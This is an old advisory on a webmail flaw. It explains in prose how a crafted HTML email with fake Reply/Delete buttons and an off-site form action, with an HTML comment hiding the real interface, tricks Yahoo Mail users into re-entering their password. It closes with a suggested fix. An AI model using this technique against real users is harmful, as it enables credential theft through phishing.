Exploit:
Makes it possible to steal passwords from users of some free
Web-based email sites including Yahoo
Mail, USA.net and
MailExcite. (Some of these
services may have fixed the problem since this writing.)
Requirements:
You have to send an email message to the user's account at, for example,
Yahoo.com. When they log in to read their mail and click the "Reply" or
"Delete" button at the bottom of the message, Yahoo Mail appears to prompt
them within the same window, "Session timeout: Please re-enter your
password". When the password is re-entered, it is sent to a hostile
site and the user continues reading their mail without noticing anything
unusual.
Yahoo! Mail does not re-write the "action" attribute of a <FORM> tag contained in an email message when that message is displayed to the user. Yahoo Mail is smart enough to insert a "target" attribute into a link, for example, so that when you click on a link that someone sends you, it opens in a separate browser window. (This way, you can't fool the user into thinking that they're still inside Yahoo Mail and give them a message like "please re-enter your password".) However, their mail parser does not re-write the <FORM> "action" attribute. (HotMail, on the other hand, does re-write the "action" attribute so this trick won't work.) That means when you click to submit a form inside an HTML email message, the result will be displayed in the same frame.
In order to get the user to submit a form within the Yahoo Mail message, make them think they're clicking on the "Reply" or "Delete" button provided by the Yahoo Mail interface. It's easy to figure out how the Yahoo Mail HTML interface is formatted, so in your HTML message, you just insert your own buttons, tables, etc. to look exactly like the bottom half of the real Yahoo message-reading interface. Follow this with an HTML opening comment "<!--" so that the *real* bottom half of the interface will be hidden. If the user clicks on the "Reply" or "Delete" buttons at the bottom instead of the ones at the top, they'll really be submitting your form.
So, combine these two tricks -- send the user an HTML email message that replaces the buttons at the bottom half of the Yahoo mail interface with your own custom buttons, in a form whose "action" URL is an off-site page (and use a comment "<!--" to hide the real bottom half of the interface). Then, when the user clicks one of those buttons, the form submission will re-direct the user to the off-site page -- all staying within the same frame of the Yahoo Mail interface, so the user thinks they never left Yahoo Mail. The off-site page can say "Timeout, please re-enter your password..."
Suggested fix for Yahoo Mail and other free Web-based email sites:
Yahoo Mail should automatically add a "target" attribute to
any <FORM> tag in an email message, so that when the user
fills out a form, the results will open in a new browser
window, with the real location visible in the Location bar.